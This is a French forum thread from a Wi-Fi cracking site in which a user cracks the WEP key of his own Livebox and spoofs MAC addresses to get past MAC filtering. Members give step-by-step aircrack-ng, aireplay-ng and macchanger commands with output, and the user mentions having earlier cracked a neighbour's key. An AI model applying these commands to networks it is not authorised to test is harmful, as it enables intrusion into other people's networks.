Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-03-2010 18:29:20

willy
Banni(e)
Inscription : 07-03-2010
Messages : 11

Changer son adresse MAC

Bonsoir à tous,je suis un nouvel utilisateur de bactrack je ne ne connais pas grand chose.Alors tout d'abord je cherche pas à craquer la clé wep de mon voisin car c'est déjà fait je lui dis et j'ai reconfiguré sa livebox en wpa tsk pour plus de sécurité mais bon.Alors voila mon problème.J'ai configuré ma box en wep avec authentification mac,je crack la clé mais je n'arrive pas à changer mon adresse mac pour me connecter à internet sous bactrack.Sous Windows ça fonctionne en utilisant etherchange j'arrive à changer mon adresse mac et à me connecter avec la clé cracké à internet mais sous bactrack je rame.
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:00:00:00:00:00
ou
macchanger -m 00:00:00:00:00:00 wlan0

ifconfig wlan0 up
après vérification ok adresse mac changé mais je n'arrive pas à me connecter
j'utilise bactrack4 en live cd

merci de vos réponses

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-03-2010 20:30:32

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Changer son adresse MAC

tu arrive a cracker la cle wep alors que le filtrage mac et activé?et une fois que ta la wep tu n'arrive pas a te co??
c"est bien sa??Mais il me semble que ce que tu nous dit et impossible car si ton filtrage mac et bien activé comment peut tu récupérer des data?
(je me trompe peut être!?)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#3 07-03-2010 21:12:32

willy
Banni(e)
Inscription : 07-03-2010
Messages : 11

Re : Changer son adresse MAC

quelques précisions, sur ma box il y a trois pc portables enregistré ,j'ai volontairement effacé mon portable de la box pour effectuer ces tests.Le portable de mon fils étant allumé je m'en suis servit pour récupérer les datas.
airdump, aireplay, aircrack.Comme je l'ai dis j'ai récupérer la clé .Sous windows j'arrive à changer mon adresse mac et à me connecter avec l'adresse mac du portable de mon fils j'ai même réussi à rentrer dans la config de la box pour récupérer l'adresse mac du portable de ma femme.Sous bactrack je n'arrive pas à me connecter je change l'adresse mac mais rien.Même dans la console wicd j'entre la clé mais pas de connection.Je vois ma box mais je n'arrive pas à me connecter.Si j'enlève l'authentification mac de ma box j'arrive à me connecter avec la clé récupérer.

Hors Ligne

#4 07-03-2010 21:57:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Changer son adresse MAC

Salut Willy

Tu saurais nous donner (toutes) les commandes que tu as tapées pour cracker la clé (en particulier celles qui concernent aireplay-ng) ? Comme l'a dit Goliate, un filtrage MAC aurait du t'empêcher de réinjecter des données, et donc de cracker la clé (sauf si tu as tout fait en passif, ce dont je doute parce que ca prend la blinde de temps).

A priori, c'est effectivement le filtrage MAC qui pose problème (vu que tu sais t'y connecter quand tu l'enlèves), mais voilà comment vérifier : tu tapes  [c]aireplay-ng -1 10 -e <nom_du_réseau> -a <adresse_mac_routeur> mon0[/c], et tu regardes si ta connexion est refusée à cause de la mac. Ensuite, tu peux taper  [c]aireplay-ng -1 10 -e <nom_du_réseau> -a <adresse_mac_du_routeur> -h <mac_acceptée> mon0[/c] pour voir si ca marche avec une adresse MAC autorisée par le réseau. Au moins avec ca on est fixés smile

Dans ce cas-là, normalement macchanger fait bien son boulot, si ca ne marche pas en te connectant avec Wicd, essaie de le faire en ligne de commande (via iwconfig, par exemple), au moins on verra s'il y a un message d'erreur. N'oublie pas le "dhclient" à la fin pour demander une adresse IP au réseau wink

Hors Ligne

#5 08-03-2010 08:07:51

willy
Banni(e)
Inscription : 07-03-2010
Messages : 11

Re : Changer son adresse MAC

salut antares145,
effectivement la récupération de la clé à été longue environs 1h30 il à fallu 95000 datas clé wep 128bits.
effectivement je n'arrive pas à injecter les paquets avec airplay.
Alors j'ai fais comme ça:
airmon-ng stop wlan0  si je fais start airodump fonctionne pas
airodump-ng --write test --channel 10 --bssid 00:00:00:00::00 wlan0
à ce moment je vois la box ESSID,BSSID,SATION
aireplay-ng -1 60 -e Livebox-f8xx -a 00:00:00:00:00:00 -h 00:00:00:00:00:00 -x 100 wlan0
Fonctionne pas
aireplay-ng -3 -e Livebox-f8xx -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 -x 100 wlan0
fonctionne pas
aircrack-ng test-01.cap
key found (environ 95000 datas 1h30)
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:00:00:00:00:00
ou
macchanger -m 00:00:00:00:00:00 wlan0

ifconfig wlan0 up
voila les commandes que j'ai fais maintenant je vais essayer ce que tu m'a dis pour voir je te tiens informer
déjà merci de vos réponses

Hors Ligne

#6 08-03-2010 14:51:59

willy
Banni(e)
Inscription : 07-03-2010
Messages : 11

Re : Changer son adresse MAC

alors c'est bon voila ce que j'ai fais:
[email protected]:~# /etc/init.d/wicd start
Starting Network connection manager: wicd.
[email protected]:~# ifconfig wlan0 down
[email protected]:~# macchanger -m 00:02:02:02:02:02 wlan0
Current MAC: 00:01:01:01:01:01 (unknown)
Faked MAC:   00:02:02:02:02:02 [wireless] (SMC SMC2642W)
[email protected]:~# ifconfig wlan0 up
[email protected]:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:02:02:02:02
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
de la j'ai démarré la console wicd j'ai entrée la clé obtenue est je me suis connecté à la box avec l'adresse mac du portable de ma femme et à aller sur internet.
Par contre je n'arrive toujours pas à injecter des paquets.

Hors Ligne

#7 08-03-2010 18:12:35

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Changer son adresse MAC

si tu test d'injecter avec wlan0 et que c'est mon0 en monitor tu risque d'avoir des soucis
regarde sa au cas ou

airmon-ng start wlan0
[email protected]:~# ifconfig mon0 down
[email protected]:~# macchanger -m 00:02:02:02:02:02 mon0
Current MAC: 00:01:01:01:01:01 (unknown)
Faked MAC:   00:02:02:02:02:02 [wireless] (SMC SMC2642W)
[email protected]:~# ifconfig mon0 up
[email protected]:~# ifconfig mon0

je c'est pas si c'est bon mais test et dit nous quoi normalement si cette adresse et acepter sa devrait injecter.non??

Dernière modification par goliate (08-03-2010 18:14:28)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#8 08-03-2010 20:19:31

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Changer son adresse MAC

goliate a écrit :

je c'est pas si c'est bon mais test et dit nous quoi normalement si cette adresse et acepter sa devrait injecter.non??

Pas si sa carte ne supporte pas l'injection wink

Wllly, tu peux commencer par faire le test d'injection ([c]aireplay -9 wlan0[/c], en te mettant sur le bon canal s'il faut). Sinon, comment tu sais que tu n'arrives pas à injecter ? Tu as un message d'erreur ou quoi ? Je ne sais pas exactement quelles adresses MAC tu as utilisées pour tes commandes aireplay-ng, mais si tu as mis 00:00:...:00:00 partout, ca ne risque pas de fonctionner, en effet smile Tu sais redonner les commandes [c]aireplay-ng -1[/c] et [c]aireplay-ng -3[/c], avec les vraies adresses, pour qu'on voie ? Et si possible le message d'erreur exacte qui te fait dire que "ca ne marche pas" smile

Comme dit Goliate, il faut voir aussi si tu dois injecter sur wlan0 ou mon0. Que renvoie exactement la commande [c]airmon-ng start wlan0[/c] ?

Hors Ligne

#9 09-03-2010 09:19:39

willy
Banni(e)
Inscription : 07-03-2010
Messages : 11

Re : Changer son adresse MAC

Alors voila le test:
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 02:02:02:02:02:02 mon0
ifconfig mon0 up
airodump-ng --write test --channel 10 --bssid xx:xx:xx:xx:xx:xx mon0

aireplay-ng -1 10 -e Livebox-f8xx -a xx:xx:xx:xx:xx:xx -h 02:02:02:02:02:02 mon0

08:56:12  Sending Authentication Request (Open System) [ACK]
08:56:12  Authentication successful
08:56:12  Sending Association Request [ACK]
08:56:12  Association successful :-) (AID: 1)


aireplay-ng -3 -e Livebox-f8xx -b xx:xx:xx:xx:xx:xx -h 02:02:02:02:02:02 -x 100 mon0

Read 1885 packets (got 29 ARP requests and 8 ACKs), sent 21969 packets...(500 pp

[email protected]:~# aireplay-ng -9 -e Livebox-f8xx -b xx:xx:xx:xx:xx:xx mon0
08:47:51  Waiting for beacon frame (ESSID: Livebox-f8xx) on channel 10
Found BSSID "xx:xx:xx:xx:xx:xx" to given ESSID "Livebox-f8xx".
08:47:51  Trying broadcast probe requests...
08:47:51  Injection is working!
08:47:53  Found 1 AP

08:47:53  Trying directed probe requests...
08:47:53  xx:xx:xx:xx:xx:xx - channel: 10 - 'Livebox-f8xx'
08:47:54  Ping (min/avg/max): 0.381ms/8.832ms/26.199ms Power: -56.34
08:47:54  29/30:  96%
Les IVs ne bougent pas!!
Je suis obliger d'attendre qu'une station ce connecte(mon fils) et surf sur le net pour récupérer les IVs
Des suggestion?
merci

Hors Ligne

#10 09-03-2010 09:23:50

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Changer son adresse MAC

il me semble que tu a une attaque ou tu na pas besoin de station conecté mais je c'est plus le nom


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
11 715 17-09-2016 18:07:01 par kcdtv
Problème adresse MAC par wifikeysusbandco
0 404 10-05-2016 19:27:21 par wifikeysusbandco
1 444 02-01-2016 18:15:25 par kcdtv
11 1575 02-12-2015 17:26:29 par Seska
0 953 08-04-2015 20:44:48 par steph06

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]